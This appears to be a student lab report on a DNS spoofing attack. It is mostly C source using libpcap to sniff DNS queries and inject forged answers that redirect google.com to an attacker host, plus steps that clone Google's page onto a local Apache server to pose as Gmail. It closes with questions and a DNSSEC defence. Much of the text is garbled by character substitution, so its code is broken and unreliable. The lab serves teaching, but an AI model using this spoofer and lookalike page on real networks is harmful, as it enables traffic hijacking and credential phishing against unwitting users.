/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B); /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* ./+*&E 1'E1<#.; 08 $/ 'E*+E) *-+ .+/ 'E*+E) */ ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns response packets
Part II: DNS attack
Normal scenario: )ereafter are the steps for the user on )ost% to connect to an ,e-site. e/g/ 0"AIL • On )ost%. user enters ,,,/gmail/com to the -ro,ser • )ost% as1s host2 for the ip address of ,,,/gmail/com • )ost2 returns the ip address of ,,,/google/com 3ipgoogle4 to host% • host% connects 3ipgoogle4 Attack scenario • User enters ,,,/gmail/com to the -ro,ser/ • )ost5 sniffs the traffic on the ,ire and tries to do !NS session hi6ac1ing -7 racing against the host2/ In fact. it tries to pro8ide a fa1e ans,er to host % 3)ost 5 returns its ip address 3ip54 instead of the actual ip address of gmail3ipgoogle4 to host %4 • )ost% recei8e the fa1e ans,er from host 5 and connects to host5 3ip54 in -elie8ing that it is tal1ing to ,,,/google/com Task 1: Create a program running on host5. called dnsattac1/c. in ,hich. it • captures the net,or1 traffic and filter out the dns pac1et 3get the code from La-59part%4 • creates the fa1e response pac1et ,ith the information mentioned a-o8e 3get code from La-59 part%4 • sends the fa1e pac1et to host% To help 7ou in creating the program. I sent 7ou the e:ample of dnsattac1/c program/ You need to add the appreciate code at different palces ,here I ha8e mar1ed ;TO <E "O!I=IE!>/
Answer% Dntai_dns_attack_v1.c
#include #include #include #include #include #include #include
<string.h> //strlen <stdlib.h> //malloc <sys/socket.h> //you know what this is for <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc <netinet/in.h> <unistd.h> //getpid <pcap.h>
/* Ethernet headers are always e actly !" bytes */
#define #$%E_E&' !" /* default snap length =ma imum bytes per packet to capture> */ #define #-*/_,E- !J!: /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ address of host */
/* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ }; pcap_t handle; /* packet capture handle */
/* functions */ 5oid print_app_info(5oid); unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; buf, int nwords)
%or (i!9; i-(nwords/7); i"") sum "! buf[i]; sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); } return 0sum;
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); } char return 0sum; dns_name_re5ert(char 3_name, char int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$9){ %or(i!9;i-first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$9) { host[len] ! D.D; len""; } } host[len] ! 9; return host; host){
} 5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char { static int count ! !; /* packet counter */ /* declare pointers to packet headers */ struct ethernet_header ethernet; /* &he ethernet header L!M */ struct ip_header ip; /* &he $/ header */ struct udp_header udp; struct dns_header dns; struct dns_3uery dns_3r; struct dns_answer dns_as; int siFe_ip; int siFe_tcp; packet)
int siFe_payload; u_char new_packet[J999]; memset(new_packet,9,J999); //copy the content of captured packet to the new buffer ip ! (struct ip_header )(packet " #$%E_E&'); bcopy(packet,new_packet,ntohs(ip&$ip_len)"#$%E_E&'); /****************8)0; -0E 0- EE E0)< 0- &'E -EE G.88E)**************************/ /* define ethernet header */ ethernet ! (struct ethernet_header )(new_packet); //'E)E $ #E$&1' &'E ;*1 #0.)1E char mac[(]; /* print source and destination $/ addresses */ printf(B#witch the souce and destination ;*1 addressesCnB); printf(B=Gefore> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); printf(B=Gefore> &oI KsCnB, ether_ntoa(ethernet&$ether_dhost)); //&0 GE ;0+$8$E+ !I bcopy(ethernet&$ether_shost,mac,(); bcopy(ethernet&$ether_dhost,ethernet&$ether_shost,(); bcopy(mac,ethernet&$ether_dhost,(); printf(B=*fter> printf(B=*fter> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); &oI KsCnB, ether_ntoa(ethernet&$ether_dhost));
/* define/compute ip header offset */ ip ! (struct ip_header )(new_packet " #$%E_E&'); siFe_ip ! $/_',(ip) "; i% (siFe_ip - 79) { printf(B * $n5alid $/ header lengthI Ku bytesCnB, siFe_ip); return; } /* print source and destination $/ addresses */ printf(B#witch the souce and destination $/ addressesCnB); printf(B=Gefore> 8romI KsCnB, inet_ntoa(ip&$ip_src)); printf(B=Gefore> &oI KsCnB, inet_ntoa(ip&$ip_dst)); //&0 GE ;0+$8$E+ 7I your code to swap the $/ addresses struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ip_src; ip&$ip_src ! ip&$ip_dst; ip&$ip_dst ! ip_addr_tmp; printf(B=*fter> printf(B=*fter> 8romI KsCnB, inet_ntoa(ip&$ip_src)); &oI KsCnB, inet_ntoa(ip&$ip_dst));
printf(B#witch the souce and destination portsCnB); udp!(struct udp_header )(new_packet " siFe_ip "#$%E_E&'); printf(B=Gefore> udp source portI Kd CnB,ntohs(udp&$udp_sport)); printf(B=Gefore> udp destination portI Kd CnB,ntohs(udp&$udp_dport)); //&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$udp_sport; udp&$udp_sport ! udp&$udp_dport; udp&$udp_dport ! port_tmp; printf(B=*fter> udp source portI Kd CnB,ntohs(udp&$udp_sport)); printf(B=*fter> udp destination portI Kd CnB,ntohs(udp&$udp_dport)); u_char 3_name; int siFe_3_name; // +ns name in 3uery
dns ! (struct dns_header )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery nameR 3_name !(u_char )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); siFe_3_name!strlen(3_name)"!;
dns_3r !(struct dns_3uery )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); dns_as !(struct dns_answer )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name " si,eo%(struct dns_3uery)); /*???????????????????????10-#&).1& +-# 'E*+E)???????????????????*/ dns&$flags!htons(9 :!:9); // flags =standard 3uery and answer> dns&$3_count!htons(9 99!); // number of 3uestion dns&$ans_count!htons(!); // number of answer dns&$auth_count!9; // number of authority dns&$add_count!9; // number of resource /* ???????????????????10-#&).1& +-# *-#EE)?????????????????????*/ bcopy(BC c9C 9cB,(dns_as&$a_name,7); dns_as&$a_type!htons(!); // type of the host dns_as&$a_class!htons(!); // class bcopy(BC 99C 99C 9JC dbB,(dns_as&$a_ttl,"); dns_as&$a_len!htons("); // &0 GE ;0+$8$E+ "I change the ip address as re3uired dns_as&$a_addr.s_addr!inet_addr(args); /*???????????????????1'E1< #.; *-+ ,E-S&'???????????????????????*/ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header) " ntohs(udp&$udp_len)); // total length siFe_ip ! $/_',(ip) "; ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (new_packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); int result; char host[J999]; dns_name_re5ert(3_name,host); printf(B,ookup domain nameI KsCnB,host ); i%(strstr(host,Bgoogle.comB)'!)*++) { result ! pcap_sendpacket (handle,new_packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } e#se { printf(BL/acket doesnDt sentMCnB); } } return;
/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu / */ #include <net/if.h> #include <sys/ioctl.h> char get_ip_address(char iface, char buf) { struct ifre3 ifr; int fd ! socket(*8_$-E&, #01<_+S)*;, 9); // type of address to retrie5e ? $/5" $/ address ifr.ifr_addr.sa_family ! *8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-*;#$%&!); ioctl(fd, #$01S$8*++), (ifr); close(fd); // result strcpy(buf, inet_ntoa(((struct sockaddr_in return buf; } )(ifr.ifr_addr )&$sin_addr));
int main(int argc,char arg5[]) { char de5 ! )*++; char errbuf[/1*/_E))G.8_#$%E]; char ip_current_address[79];
/* capture de5ice name */ /* error buffer */ /* /* /* /* /* filter e pression LHM */ compiled filter program =e pression> */ subnet mask */ ip */ number of packets to capture */
char filter_e p[] ! Budp dst port JHB; struct bpf_program fp; bpf_u_intH7 mask; bpf_u_intH7 net; int num_packets ! 9;
/* check for capture de5ice name on command?line */ i% (argc !! 7) { de5 ! arg5[!]; } e#se i% (argc $ 7) { fprintf(stderr, BerrorI unrecogniFed command?line optionsCnCnB); //print_app_usage=>R e it(ET$&_8*$,.)E); } e#se { /* find a capture de5ice if not specified on command?line */ de5 ! pcap_lookupde5(errbuf); i% (de5 !! )*++) { fprintf(stderr, B1ouldnDt find default de5iceI KsCnB, errbuf); e it(ET$&_8*$,.)E); } } /* get network number and mask associated with capture de5ice */ i% (pcap_lookupnet(de5, (net, (mask, errbuf) !! &!) { fprintf(stderr, B1ouldnDt get netmask for de5ice KsI KsCnB, de5, errbuf); net ! 9; mask ! 9; } /* print capture info */ printf(B+e5iceI KsCnB, de5); printf(B-umber of packetsI KdCnB, num_packets); printf(B8ilter e pressionI KsCnB, filter_e p); get_ip_address(de5,ip_current_address); printf(B1urrent $/ *ddressI KsCnB, ip_current_address); /* open capture de5ice */ handle ! pcap_open_li5e(de5, #-*/_,E-, !, !999, errbuf); i% (handle !! )*++) { fprintf(stderr, B1ouldnDt open de5ice KsI KsCnB, de5, errbuf); e it(ET$&_8*$,.)E); } /* make sure weDre capturing on an Ethernet de5ice L7M */ i% (pcap_datalink(handle) '! +,&_E-!9;G) { fprintf(stderr, BKs is not an EthernetCnB, de5); e it(ET$&_8*$,.)E); } /* compile the filter e pression */ i% (pcap_compile(handle, (fp, filter_e p, 9, net) !! &!) { fprintf(stderr, B1ouldnDt parse filter KsI KsCnB, filter_e p, pcap_geterr(handle)); e it(ET$&_8*$,.)E); } /* apply the compiled filter */ i% (pcap_setfilter(handle, (fp) !! &!) { fprintf(stderr, B1ouldnDt install filter KsI KsCnB, filter_e p, pcap_geterr(handle)); e it(ET$&_8*$,.)E); } /* now we can set our callback function */ pcap_loop(handle, num_packets, got_packet, (u_char )ip_current_address);
/* cleanup */ pcap_freecode((fp); pcap_close(handle); printf(BCn1apture complete.CnB); return 9; }
E plain: ! "o#i$ie# co#e 1:
//'E)E $ #E$&1' &'E ;*1 #0.)1E char mac[(]; /* print source and destination $/ addresses */ printf(B#witch the souce and destination ;*1 addressesCnB); printf(B=Gefore> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); printf(B=Gefore> &oI KsCnB, ether_ntoa(ethernet&$ether_dhost)); //&0 GE ;0+$8$E+ !I bcopy(ethernet&$ether_shost,mac,(); bcopy(ethernet&$ether_dhost,ethernet&$ether_shost,(); bcopy(mac,ethernet&$ether_dhost,(); printf(B=*fter> printf(B=*fter> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); &oI KsCnB, ether_ntoa(ethernet&$ether_dhost));
! "o#i$ie# co#e 2:
//&0 GE ;0+$8$E+ 7I your code to swap the $/ addresses struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ip_src; ip&$ip_src ! ip&$ip_dst; ip&$ip_dst ! ip_addr_tmp;
! "o#i$ie# co#e %:
//&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$udp_sport; udp&$udp_sport ! udp&$udp_dport; udp&$udp_dport ! port_tmp;
! "o#i$ie# co#e &:
/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu / */ #include <net/if.h> #include <sys/ioctl.h> char get_ip_address(char iface, char buf) { struct ifre3 ifr; int fd ! socket(*8_$-E&, #01<_+S)*;, 9); // type of address to retrie5e ? $/5" $/ address ifr.ifr_addr.sa_family ! *8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-*;#$%&!); ioctl(fd, #$01S$8*++), (ifr); close(fd); // result strcpy(buf, inet_ntoa(((struct sockaddr_in return buf; )(ifr.ifr_addr )&$sin_addr));
} U 5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char { U // &0 GE ;0+$8$E+ "I change the ip address as re3uired dns_as&$a_addr.s_addr!inet_addr(args); 2 } U int main(int argc,char arg5[]) { 2 char ip_current_address[79]; 2 get_ip_address(de5,ip_current_address); printf(B1urrent $/ *ddressI KsCnB, ip_current_address); 2 /* now we can set our callback function */
packet)
pcap_loop(handle, num_packets, got_packet, (u_char )ip_current_address); V U char 2
! "o#i$ie# co#e E tra:
dns_name_re5ert(char 3_name, char int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$9){ %or(i!9;i-first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$9) { host[len] ! D.D; len""; } } host[len] ! 9; return host; host){
} U 5oid got_packet(u_char args, const struct pcap_pkthdr { 2 char host[J999]; dns_name_re5ert(3_name,host); printf(B,ookup domain nameI KsCnB,host ); i%(strstr(host,Bgoogle.comB)'!)*++) {
header, const u_char
packet)
result ! pcap_sendpacket (handle,new_packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } e#se { printf(BL/acket doesnDt sentMCnB); } 2 V
Task 2: Install a ,e-ser8er on host5. create a home page to ma1e it loo1 li1e ,,,/gmail/com Ans'er: (n )ost2
& & & & & sudo apt&3et insta## apache. sudo service apache. start cd /var/www/ sudo su root w3et 3oo3#e.com 45 inde6.htm#
Task %: Test and ma1e sure 7our attac1 ,or1s 9 On host5. run sudo /?dntai_dns_attack
- On host%. run terminal.
• • T7pe nslookup google.com 3attac1ers redirects dns of google4 T7pe nslookup vnexpress.net
•
Open =irefo:. t7pe in address google*com
•
Screen on )ost %
Question 1: Compare the dns request and dns response with respect to a) Source MAC address and Destination MAC address b) P source, P destination c) source port, destination port Ans'er • !ns Re@uest 8s !ns Reponse a-out "ac Address !equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Ip Address !equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Aort !equest
!esponse
• Result dns re@uest and response s,ap each other a-out mac address. ip address. and port -et,een source and destination/ Question 2" #hat is the ro$e o% &ransaction D %ie$d o% the DNS packet' Ans'er Transaction I! is a %&9-it field identif7ing a specific !NS transaction/ The transaction I! is created -7 the message originator and is copied -7 the responder into its response message/ Using the transaction I!. the !NS client can match responses to its re@uests/ Question 3: (ind a so$ution to pre)ent dns session hi*ackin+ attack Answer: A solution to prevent dns session hijacking attack is !""#$: The !omain Name S7stem Securit7 E:tensions 3!NSSEC4 is a suite ofInternet Engineering Tas1 =orce 3IET=4 specifications for securing certain 1inds of information pro8ided -7 the !omain Name S7stem 3!NS4 as used on Internet Arotocol 3IA4 net,or1s/ It is a set of e:tensions to !NS ,hich pro8ide to !NS clients 3resol8ers4 origin authentication of !NS data. authenticated denial of e:istence. and data integrit7. -ut not a8aila-ilit7 or confidentialit7/ 3Bi1i4
!!! +,t !!!
